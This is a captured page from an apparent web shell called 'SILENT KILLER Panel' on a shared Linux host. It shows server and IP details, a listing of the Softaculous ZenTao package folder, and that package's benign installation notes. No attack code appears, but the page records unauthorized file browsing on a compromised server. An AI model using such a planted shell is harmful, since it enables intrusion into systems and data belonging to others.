SILENT KILLERPanel

Current Path: > > > var > softaculous > zentao


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: ///var/softaculous/zentao

NameTypeSizeLast ModifiedActions
images Directory - -
php53 Directory - -
php56 Directory - -
php71 Directory - -
php81 Directory - -
php82 Directory - -
_clone.php File 2479 bytes November 13 2024 12:04:34.
edit.php File 4469 bytes July 03 2025 11:16:14.
edit.xml File 433 bytes December 04 2024 14:26:18.
fileindex.php File 115 bytes November 13 2024 12:04:34.
import.php File 3358 bytes July 03 2025 11:16:14.
index.php File 43 bytes December 23 2021 11:54:36.
info.xml File 3653 bytes July 03 2025 07:20:00.
install.js File 924 bytes December 23 2021 11:54:36.
install.php File 5137 bytes July 03 2025 11:16:14.
install.xml File 997 bytes November 13 2024 12:04:34.
md5 File 1470 bytes July 03 2025 11:16:14.
my.php File 550 bytes July 03 2025 07:20:00.
notes.txt File 1712 bytes July 03 2025 07:20:00.
upgrade.php File 60841 bytes July 03 2025 11:16:14.
upgrade.xml File 507 bytes December 23 2021 11:54:36.
zentao.sql File 1980480 bytes July 03 2025 07:20:00.
zentao.zip File 100902674 bytes July 03 2025 07:20:00.

Reading File: ///var/softaculous/zentao/notes.txt

1. install without demo data
2. comment php_value and php_flag from www/.htaccess ( Suggested by vendor as php_value and php_flag causes issue on suPHP servers )
3. index.php is our file to redirect url.
4. PHP REQUIREMENT LINK : Read doc/INSTALL File
5. Keep $config->requestType  = 'GET'; in my.php (Confirmed with vendor via email)
6. set timezone "(UTC-05:00) Eastern Time (US & Canada)"
7. Download international package which is named as ZenTaoALM.{{version}}.stable.int(suggested by vendor in email).
8. Select mode : Keep the 'ALM' mode.
9. PHP version set to 5.5 from 5.2 check and revert if its working on php 5.3
10. We have removed lines i.e  SET global log_bin_trust_function_creators = 1; and SET global sql_mode = ''; from updatefunctions.sql and zentao.sql on vendor recommendation via email as upgrade was throwing error from 16.4 to 17.0. (This is mandatory to remove in every version as 16.x to 17.x upgrade breaks if this isn't removed. Not needed while manual installation)
(Check if vendor includes these changes in next version in package itself)
11. Since version 17.5 we have added MYSQL >= 5.6.0 requirement in info.xml since it was throwing error for INNODB engine on MYSQL 5.5.
12. "key" value in generated in config table on visiting admin panel.
13. Keep DBprefix 'zt_' only as suggested by vendor over ticket.
14. Kept 5.7 as mysql requirement in info.xml as on 5.6 it was throwing key size issue.
15. Keep $config->timezone        = 'US/Eastern'; in config/my.php config file, since it's hardcoded as Asia/Shanghai inside config/config.php i.e $config->timezone      = getEnvData('ZT_TIMEZONE', 'Asia/Shanghai');. But this can be set via admin panel (The entry is added to db)

SILENT KILLER Tool